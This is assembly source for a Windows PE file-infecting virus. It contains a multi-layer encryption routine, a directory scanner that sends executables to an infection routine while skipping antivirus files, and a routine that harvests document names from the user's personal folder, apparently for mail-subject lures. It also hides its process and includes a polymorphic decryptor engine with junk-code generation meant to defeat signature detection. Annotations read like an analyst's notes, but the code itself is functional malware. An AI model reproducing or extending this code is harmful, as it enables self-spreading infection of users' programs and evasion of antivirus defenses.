        loop    genPolyDataL

        mov     al,0c3h
        stosb

        mov     ecx,[lCnt]
        xor     esi,esi
encryptLayers:
        mov     ebx,[kStack+esi]
        mov     edx,[mStack+esi]
        push    esi
        push    ecx
        call    encryptLayer
        pop     ecx
        pop     esi
        add     esi,4
        loop    encryptLayers

        pop     esi
        sub     edi,esi
        mov     ecx,edi
        ret

;-----------------------------------------------------------------------
; encryptLayer -- apply one encryption layer in place over the body that
; the decryptor generated by brepoge will undo at run time.
;
; In:   ebx = layer key; bit 0 doubles as the width flag (1 = 16-bit key
;             in bx, 0 = 8-bit key in bl -- this is how brepoge builds vKey)
;       edx = layer method: 0 = XOR, _ADD, anything else = SUB (same
;             codes as brepoge's mKey)
;       [poly] = buffer start; processing begins 5 bytes in (presumably a
;                5-byte instruction/header is left in clear -- confirm)
;       [vsize] + dropperSize = number of bytes covered
; Out:  nothing; clobbers eax, ecx, esi, flags
;
; The operation is the INVERSE of what the decryptor does: for method
; _ADD the decryptor adds, so this side subtracts, and vice versa; XOR is
; self-inverse.  With a 16-bit key the byte count is halved, so an odd
; trailing byte is left untouched.  This is reversible obfuscation, not
; cryptography -- key and method are embedded in the emitted decryptor.
;-----------------------------------------------------------------------
encryptLayer:
        mov     esi,[poly]
        add     esi,5                   ; skip the first 5 bytes of the buffer
        mov     eax,[vsize]
        add     eax,dropperSize         ; eax = bytes to process
        test    ebx,1                   ; bit 0 of the key selects 8/16-bit
        jz      _encryptLayer8
        shr     eax,1                   ; 16-bit: iterate over words
        mov     ecx,eax
_encryptLayer16l:
        or      edx,edx
        jz      _encryptXOR16           ; method 0 -> XOR
        cmp     edx,_ADD
        je      _encryptADD16
        add     [esi],bx                ; method SUB: decryptor subtracts, so add here
        jmp     _encryptFNCOK16
_encryptADD16:
        sub     [esi],bx                ; method ADD: decryptor adds, so subtract here
        jmp     _encryptFNCOK16
_encryptXOR16:
        xor     [esi],bx
_encryptFNCOK16:
        add     esi,2
        loop    _encryptLayer16l
        ret
_encryptLayer8:
        mov     ecx,eax                 ; 8-bit: one iteration per byte
_encryptLayer8l:
        or      edx,edx
        jz      _encryptXOR8            ; method 0 -> XOR
        cmp     edx,_ADD
        je      _encryptADD8
        add     [esi],bl                ; method SUB -> add here
        jmp     _encryptFNCOK8
_encryptADD8:
        sub     [esi],bl                ; method ADD -> subtract here
        jmp     _encryptFNCOK8
_encryptXOR8:
        xor     [esi],bl
_encryptFNCOK8:
        inc     esi
        loop    _encryptLayer8l
        ret

; - infectpe.inc EOF -

; - findfiles.inc BOF -

[extern FindFirstFileA]
[extern FindNextFileA]
[extern FindClose]
[extern SetCurrentDirectoryA]
[extern GetCurrentDirectoryA]
[extern MessageBoxA]

;-----------------------------------------------------------------------
; scandirpe -- enumerate the current directory with FindFirstFileA /
; FindNextFileA(fmask) and hand every candidate to infectpe.
;
; Globals: finddata (WIN32_FIND_DATAA; nFileSizeLow and cFileName are
; presumably labels inside it -- confirm), fmask, findHnd.
; A file is skipped when any of these holds:
;   * nFileSizeLow < 2000h (only the low size dword is ever looked at)
;   * nFileSizeLow is an exact multiple of PADDING (presumably the marker
;     for an already-infected file -- confirm against infectpe)
;   * isAV returns CF=1 for the name (esi = edi = cFileName)
; No return value.  FindClose runs only when FindFirstFileA succeeded;
; notFound is reached solely on that failure.
; Clobbers eax, ecx, edx, esi, edi, flags plus whatever isAV/infectpe do.
;-----------------------------------------------------------------------
scandirpe:
        push    dword finddata
        push    dword fmask
        call    FindFirstFileA
        inc     eax                     ; INVALID_HANDLE_VALUE (-1) -> 0
        jz      notFound
        dec     eax

        mov     dword [findHnd],eax

findNext:
        mov     eax,dword [nFileSizeLow]
        cmp     eax,2000h
        jb      skipThisFile            ; smaller than 8 KiB
        mov     ecx,PADDING
        xor     edx,edx                 ; edx:eax / PADDING (unsigned)
        div     ecx
        or      edx,edx
        jz      skipThisFile            ; remainder 0 -> skip (see header)

        lea     esi,[cFileName]

        mov     edi,esi
        call    isAV                    ; CF=1 -> name rejected
        jc      skipThisFile

        call    infectpe

skipThisFile:
        push    dword finddata
        push    dword [findHnd]
        call    FindNextFileA
        or      eax,eax
        jnz     findNext                ; 0 = no more files

endScan:
        push    dword [findHnd]
        call    FindClose

notFound:
        ret

;-----------------------------------------------------------------------
; scansubject -- pick a file name from the PersonalP directory and copy
; it into gsubject (cut at the first '.', '"' characters dropped), with
; its length in ssubj.  The names suggest a mail-subject lure built from
; a document name in the user's personal folder; the consumer is not
; visible here -- confirm.
;
; Runs only when [pflag] == 1.  Any failure -- GetCurrentDirectoryA,
; SetCurrentDirectoryA, FindFirstFileA, or a resulting name shorter than
; 4 characters -- clears pflag to 0.  The caller's current directory is
; saved in a 260-byte stack buffer and restored before returning.
;
; Frame: after the prologue ebp points at the local 260-byte buffer
; (the frame pointer itself is kept by the extra 'push ebp' and put back
; by 'pop ebp' before 'leave'), so 'push ebp' below passes the buffer
; address to GetCurrentDirectoryA / SetCurrentDirectoryA.
;
; Buffer note: the copy loop stops after 63 stored bytes WITHOUT writing
; a terminator on that path, and ssubj then holds 62 although 63 bytes
; were stored; gsubject must hold at least 63 bytes.
; Clobbers eax, ecx, edx, esi, edi, flags.
;-----------------------------------------------------------------------
scansubject:
        push    ebp
        mov     ebp,esp
        sub     esp,260                 ; local buffer for the saved directory
        push    ebp                     ; keep the frame pointer
        sub     ebp,260                 ; ebp = buffer address

        cmp     byte [pflag],1
        jne     near notFoundSubj

        push    ebp                     ; lpBuffer = local buffer
        push    dword 260
        call    GetCurrentDirectoryA
        or      eax,eax
        jz      near notFoundSubjKO     ; nothing changed yet -> no restore needed

        push    dword PersonalP
        call    SetCurrentDirectoryA
        or      eax,eax
        jz      near notFoundSubjKOBACK

        push    dword finddata
        push    dword fmaskall
        call    FindFirstFileA
        inc     eax                     ; INVALID_HANDLE_VALUE (-1) -> 0
        jz      near notFoundSubjKOBACK
        dec     eax

        mov     dword [findHnd],eax

findNextSubj:
        xor     edx,edx
        mov     dword [ssubj],edx
        lea     esi,[cFileName]
        lea     edi,[gsubject]
storeSubjLoop:
        lodsb
        cmp     al,'.'
        jne     notDot
        xor     eax,eax                 ; first '.' becomes the terminator
notDot:
        cmp     al,'"'
        je      storeSubjLoop           ; double quotes are dropped
        stosb
        inc     edx                     ; edx = bytes stored (terminator included)
        or      al,al
        jz      subjOk
        cmp     edx,63
        je      subjOk                  ; cap reached: no terminator written on this path
        jmp     storeSubjLoop
subjOk:
        dec     edx                     ; length without terminator (62 on the cap path)
        mov     dword [ssubj],edx

        push    dword 10h
        call    rnd
        or      eax,eax
        jz      endScanSubj             ; rnd(10h) == 0 -> keep the current name

        push    dword finddata
        push    dword [findHnd]
        call    FindNextFileA
        or      eax,eax
        jnz     findNextSubj            ; no more files -> keep the last name gathered

endScanSubj:
        push    dword [findHnd]
        call    FindClose

        push    ebp                     ; restore the saved directory
        call    SetCurrentDirectoryA

        cmp     dword [ssubj],4
        jb      notFoundSubjKO          ; shorter than 4 chars counts as failure

notFoundSubj:
        pop     ebp                     ; back to the frame pointer
        leave
        ret

notFoundSubjKOBACK:
        push    ebp                     ; restore the saved directory first
        call    SetCurrentDirectoryA

notFoundSubjKO:
        mov     byte [pflag],0          ; disable this feature for the caller
        pop     ebp
        leave
        ret

; - findfiles.inc EOF -
; - process.inc BOF -

[extern LoadLibraryA]
[extern GetProcAddress]

;-----------------------------------------------------------------------
; stealthProc -- resolve registerSrvProc from kernel32dll at run time and,
; if present, call it as func(0, 1) (stdcall: first argument 0, second 1).
; The symbol names fit the Win9x RegisterServiceProcess(0 = current
; process, 1 = RSP_SIMPLE_SERVICE) call that hides a process from the
; task list -- the string contents are not visible here; confirm.
; Where the export does not exist GetProcAddress returns 0 and nothing
; is called.  Resolving by name keeps the API out of the import table.
; The LoadLibraryA result is passed on unchecked; only the GetProcAddress
; result is tested.  No inputs; clobbers eax, ecx, edx, flags.
;-----------------------------------------------------------------------
stealthProc:
        push    dword kernel32dll
        call    LoadLibraryA            ; result not checked

        push    dword registerSrvProc
        push    eax
        call    GetProcAddress
        or      eax,eax
        jz      notStealthProc          ; export missing -> no-op

        push    dword 1                 ; second argument
        push    dword 0                 ; first argument
        call    eax                     ; stdcall target cleans the stack

notStealthProc:
        ret

; - process.inc EOF -

; - poly.inc BOF -

; Size limits for the polymorphic decryptor layers (32 layers x 512 bytes
; matches the "about 16kbs" figure below).  Where MAXPOLY is enforced is
; not visible here.
MAXPOLY         equ     512
MAXLAYER        equ     32 ; from 16 to 32 layers = max about 16kbs poly

; Register numbers.  These are the x86 ModRM reg/rm field encodings, so
; the emitters (e.g. _xormri) can add them straight into a ModRM byte.
_EAX            equ     0
_ECX            equ     1
_EDX            equ     2
_EBX            equ     3
_ESP            equ     4               ; never allocated: brepoge marks it busy
_EBP            equ     5               ; needs a disp8 form in ModRM (see _xormri)
_ESI            equ     6
_EDI            equ     7

; Encryption method codes shared by brepoge (mKey) and encryptLayer (edx).
_XOR            equ     0
_ADD            equ     1
_SUB            equ     2

;
; BREPOGE
;
; it uses simple [XOR|ADD|SUB] as encryption function
; the keys used will be 16 or 8 bits
;
; junk is generated with the same generation schemes as the algorithm code
;
; most of the basic generators don't support esp, so esp is never used (it is marked busy in the register table)
;
; check infectpe.inc to see 'how to multi-layer'
;
; brepoge usage:
;
;  in: edi destination buffer
;      esi idx init
;      ecx size to encrypt
; out: ecx size of generated code
;
; required: extern DWORD rnd(DWORD top) -> return rnd number from 0 to top
;
; description of generation scheme:
;
; basic
;
; bmov r32,i32: lea r32,[i32]
;               mov r32,i32
;               push i32 / pop r32
;
; bmov r32,rb32: mov r32,rb32
;                push rb32 / pop r32
;
; baddsub r32,i32: add r32,-i32
;                  sub r32,i32
; push r32
; pop  r32
; push i32
; add r32,i32
; sub r32,i32
; xor [r32],i16/8
; add [r32],i16/8
; sub [r32],i16/8
; or r32,r32 (cmp r32,0)
;
; complex (recursive)
;
; cmov r32,rb32: bmov r32,rb32
;                cmov rt32,rb32 / cmov r32,rt32
;
; cmov r32,i32: bmov r32,i32
;               cmov r32,i32+mod / baddsub r32,mod
;               cmov rt32,i32 / cmov r32,rt32
;
; TO DO
;
; + garbage generator
; + more recursive shit (calls, jmps, cmps)
; + add other encryption funcs (ror/rol)
; + add key slide to encryption algorithm
;
; Just coded to avoid naked viruses :)
;
;-----------------------------------------------------------------------
; brepoge -- emit one randomised decryptor loop (one layer) at edi.
;
; In:   edi = output buffer
;       esi = address the decryptor will start at (vIdx)
;       ecx = number of bytes to decrypt (vCnt); halved to a word count
;             when a 16-bit key is chosen
; Out:  ecx = number of bytes emitted
;       edi = reset to the START of the output buffer (not its end)
;       [vKey] = layer key and [mKey] = method (0 XOR / _ADD / _SUB),
;       which the caller must feed to encryptLayer (ebx/edx) for this layer
;       Clobbers eax, edx, esi, flags; the register table is reset.
;
; Emitted shape (J = optional junk, see 'junk'):
;   J ; rIdx = vIdx and rCnt = vCnt in random order, J between
;   loop: J ; op [rIdx], key   (xor/add/sub, 8- or 16-bit by key)
;         rIdx += 1|2 and rCnt -= 1 in random order, J between
;         or rCnt,rCnt ; jnz loop   (0F 85 rel32)
;   J
; Each mov-imm / mov-reg / add-sub step is expanded by the cmov*/baddsub
; generators, so opcodes and register choice differ per call.  Stable
; features for anyone matching this stub: esp is never used, the
; 'or r,r' is immediately followed by the 6-byte jnz, and no
; flag-clobbering junk is placed between the two.
;
; Key encoding: bit 0 of vKey is the width flag -- 8-bit keys are masked
; to 0..0FEh (bit 0 clear), 16-bit keys get bit 0 forced on.  bk0 and
; encryptLayer read that bit; _xormri decides from dh instead (see there).
;-----------------------------------------------------------------------
brepoge:
        push    edi                     ; [esp] = buffer start for the final size computation

        mov     [vIdx],esi
        mov     [vCnt],ecx

        push    edi
        lea     edi,[registers]         ; clear the 8-entry register-in-use table
        xor     eax,eax
        stosd
        stosd
        pop     edi
        mov     byte [registers+_ESP],1 ; esp is never handed out
        mov     byte [freer],6          ; free-register count (6, not 7: presumably one more is held back -- confirm in getFreeReg)

        call    junk

        push    dword 2
        call    rnd
        mov     [mKey],eax              ; 0 = XOR, _ADD = ADD, other = SUB

        call    getFreeReg
        mov     [rIdx],eax              ; pointer register for this layer
        call    getFreeReg
        mov     [rCnt],eax              ; counter register for this layer

        push    dword -1
        call    rnd
        test    eax,1
        jz      key8bits
        push    eax                     ; 16-bit key: mix two rnd() results ...
        push    dword -1
        call    rnd
        rol     eax,8
        pop     edx
        adc     eax,edx
        or      eax,1                   ; ... and force bit 0 = "16-bit"
        jmp     dontclip
key8bits:
        and     eax,0feh                ; 8-bit key, bit 0 clear (dh is zero too)
dontclip:
        mov     [vKey],eax

        test    eax,1
        jz      fullcounter

        mov     eax,[vCnt]
        shr     eax,1                   ; 16-bit key: count words, not bytes
        mov     [vCnt],eax
fullcounter:

        push    dword 2
        call    rnd
        or      eax,eax
        jz      callbk00

        call    bk01                    ; rCnt = vCnt
        call    junk
        call    bk00                    ; rIdx = vIdx
        jmp     endbk00s
callbk00:
        call    bk00
        call    junk
        call    bk01
endbk00s:

        push    edi                     ; [esp] = loop start (jnz target)

        call    junk

        mov     eax,[mKey]
        or      eax,eax
        jz      doXOR

        cmp     eax,_ADD
        je      doADD

        mov     eax,[rIdx]
        mov     edx,[vKey]
        call    _submri                 ; emit sub [rIdx],key (emitter not shown)
        jmp     endFUNCTION
doADD:
        mov     eax,[rIdx]
        mov     edx,[vKey]
        call    _addmri                 ; emit add [rIdx],key (emitter not shown)
        jmp     endFUNCTION
doXOR:
        mov     eax,[rIdx]
        mov     edx,[vKey]
        call    _xormri                 ; emit xor [rIdx],key
endFUNCTION:

        push    dword 2
        call    rnd
        or      eax,eax
        jz      callbk0

        call    bk1                     ; rCnt -= 1
        call    junk
        call    bk0                     ; rIdx += 1 or 2
        jmp     endbks
callbk0:
        call    bk0
        call    junk
        call    bk1
endbks:

        mov     eax,[rCnt]
        call    _orrr                   ; or rCnt,rCnt -- sets ZF for the jnz that follows directly

        pop     esi                     ; loop start
        sub     esi,edi
        sub     esi,6                   ; rel32 = loopStart - (address after the 6-byte jnz)

        mov     ax,850fh
        stosw                           ; 0F 85 = jnz rel32
        mov     eax,esi
        stosd

        call    junk

        pop     ecx                     ; buffer start
        sub     edi,ecx                 ; edi = bytes emitted
        xchg    ecx,edi                 ; ecx = size, edi = buffer start
        ret
; bk00 -- emit "rIdx = vIdx" (pointer register loaded with the start
; address) through the randomised cmovri generator.  eax = register
; number, edx = immediate.  Clobbers eax, edx, flags.
bk00:
        mov     eax,[rIdx]
        mov     edx,[vIdx]
        call    cmovri
        ret
; bk01 -- emit "rCnt = vCnt" (counter register loaded with the byte or
; word count) through the randomised cmovri generator.  eax = register
; number, edx = immediate.  Clobbers eax, edx, flags.
bk01:
        mov     eax,[rCnt]
        mov     edx,[vCnt]
        call    cmovri
        ret
;-----------------------------------------------------------------------
; bk0 -- emit the pointer advance: rIdx += 1 (8-bit key) or rIdx += 2
; (16-bit key, bit 0 of vKey set), via a temporary register:
;     t = rIdx ; t -= (-1|-2) ; rIdx = t
; cmovrr register pair: al = source, ah = destination (consistent with
; the recursion in cmovrr; bmovrr itself is not visible -- confirm).
; baddsub r,i emits r -= i ("add r,-i / sub r,i" per the scheme), so a
; negative edx is an increment.  Clobbers eax, edx, flags; the temporary
; register is released before returning.
;-----------------------------------------------------------------------
bk0:
        call    getFreeReg              ; t
        push    eax                     ; [esp] = t across the emitter calls
        mov     edx,[rIdx]
        mov     ah,dl
        xchg    ah,al                   ; al = rIdx (src), ah = t (dst)
        call    cmovrr                  ; t = rIdx

        mov     eax,[esp]
        xor     edx,edx
        dec     edx                     ; edx = -1
        test    dword [vKey],1
        jz      key8bitsb
        dec     edx                     ; 16-bit key: edx = -2
key8bitsb:
        call    baddsub                 ; t -= edx, i.e. t += 1 or 2

        mov     eax,[esp]
        mov     edx,[rIdx]
        mov     ah,dl                   ; al = t (src), ah = rIdx (dst)
        call    cmovrr                  ; rIdx = t

        pop     eax
        call    freeReg                 ; release t
        ret
;-----------------------------------------------------------------------
; bk1 -- emit the counter decrement  rCnt -= 1  via a temporary register:
;     t = rCnt ; t -= 1 ; rCnt = t
; Same cmovrr convention as bk0 (al = source, ah = destination) and
; baddsub r,i emits r -= i.  Clobbers eax, edx, flags; the temporary
; register is released before returning.
;-----------------------------------------------------------------------
bk1:
        call    getFreeReg              ; t
        push    eax                     ; [esp] = t across the emitter calls
        mov     edx,[rCnt]
        mov     ah,dl
        xchg    ah,al                   ; al = rCnt (src), ah = t (dst)
        call    cmovrr                  ; t = rCnt

        mov     eax,[esp]
        xor     edx,edx
        inc     edx                     ; edx = 1
        call    baddsub                 ; t -= 1

        mov     eax,[esp]
        mov     edx,[rCnt]
        mov     ah,dl                   ; al = t (src), ah = rCnt (dst)
        call    cmovrr                  ; rCnt = t

        pop     eax
        call    freeReg                 ; release t
        ret

;-----------------------------------------------------------------------
; junk -- emit rnd(4) do-nothing "mov reg,imm32" sequences (zero of them
; when rnd returns 0).  Each one loads a random 32-bit immediate into a
; register obtained from getFreeReg -- so never rIdx, rCnt or esp once
; those are reserved -- via the randomised cmovri expansion, and frees
; the register straight away.  The expansions can include add/sub, so
; flags are not preserved; brepoge only places junk where that is safe.
; No calls are emitted here.  Clobbers eax, ecx, edx, flags.
;-----------------------------------------------------------------------
junk:
        push    dword 4
        call    rnd
        or      eax,eax
        jz      junk1                   ; rnd(4) == 0 -> no junk this time
        mov     ecx,eax                 ; otherwise that many junk moves
junk0:
        push    ecx
        push    dword -1
        call    rnd                     ; random 32-bit immediate
        mov     edx,eax
        call    getFreeReg
        push    eax
        call    cmovri                  ; (complex) mov reg,imm
        pop     eax
        call    freeReg                 ; register immediately reusable
        pop     ecx
        loop    junk0
junk1:
        ret

;-----------------------------------------------------------------------
; _xormri -- emit "xor [reg32], imm" at edi.
; In:  al  = register number of the pointer register (_EAX.._EDI)
;      edx = key; dh != 0 selects the 16-bit form (66 81 /6 iw),
;            otherwise the 8-bit form (80 /6 ib)
; Out: edi advanced past the emitted bytes; clobbers eax, flags
;
; The operand width is decided from dh, not from the key's bit 0 that
; encryptLayer and bk0 use.  The two agree because brepoge masks 8-bit
; keys to 0..0FEh (dh = 0) and 16-bit keys normally carry a non-zero
; high byte; a 16-bit key whose high byte happens to be zero would be
; emitted as an 8-bit op while the pointer still advances by 2 (for XOR
; that is equivalent since bh = 0; _addmri/_submri are not visible here).
; EBP is special-cased: mod=00 rm=101 would mean [disp32], so it uses
; mod=01 with a zero disp8.  ESP (rm=100, needs a SIB byte) is never
; passed in -- brepoge marks it busy.
;-----------------------------------------------------------------------
_xormri:
        mov     ah,1
        test    dh,0ffh
        jz      __xormri8
        push    eax
        mov     al,66h                  ; operand-size prefix for the 16-bit form
        stosb
        pop     eax
        inc     ah
__xormri8:
        dec     ah                      ; ah = 1 (16-bit) or 0 (8-bit)
        cmp     al,_EBP
        jne     __xormriNOEBP
        mov     al,75h                  ; ModRM 01 110 101 = [ebp+disp8], /6
        add     ah,80h                  ; opcode 81h (imm16) or 80h (imm8)
        xchg    al,ah
        stosw                           ; opcode, ModRM
        mov     al,00
        stosb                           ; disp8 = 0
        jmp     __xormri0
__xormriNOEBP:
        add     ah,80h                  ; opcode 81h (imm16) or 80h (imm8)
        add     al,30h                  ; ModRM 00 110 rrr = [reg], /6 (xor)
        xchg    al,ah
        stosw                           ; opcode, ModRM
__xormri0:
        test    dh,0ffh
        jz      __xormri8b
        mov     ax,dx
        stosw                           ; imm16
        ret
__xormri8b:
        mov     al,dl
        stosb                           ; imm8
        ret

;-----------------------------------------------------------------------
; cmovrr -- emit a "complex" register-to-register move: either a basic
; move (bmovrr) or, recursively, a move through a freshly allocated
; temporary register t:  cmov t,src ; cmov dst,t  (scheme above).
; In:  al = source register number, ah = destination register number
;      (convention inferred from bk0/bk1 and the recursion below;
;      bmovrr is not visible -- confirm)
; Out: edi advanced; clobbers eax, edx, flags
; Recursion stops when rnd(2) yields 0 or no free register is left
; ([freer] == 0).  The code relies on freeReg leaving al intact, and t
; is released before the second half is emitted, so a deeper expansion
; may pick it up again as its own temporary (harmless for a move).
;-----------------------------------------------------------------------
cmovrr:
        push    eax
        push    dword 2
        call    rnd
        cmp     al,0                    ; only the low byte of rnd() is tested
        jne     _cmovrr0
        pop     eax
        jmp     bmovrr                  ; basic move (tail call)
_cmovrr0:
        pop     eax
        cmp     byte [freer],0
        je      bmovrr                  ; no temporary available: basic move
        push    eax                     ; [esp] = original (src,dst)
        call    getFreeReg              ; t
        push    eax                     ; [esp] = t
        mov     dl,al
        mov     eax,[esp+4]
        mov     ah,dl                   ; al = src, ah = t
        call    cmovrr                  ; cmov t,src
        pop     eax                     ; t
        call    freeReg                 ; release t (al assumed preserved)
        mov     dl,al
        pop     eax                     ; original pair
        mov     al,dl                   ; al = t, ah = dst
        jmp     cmovrr                  ; cmov dst,t (tail call)
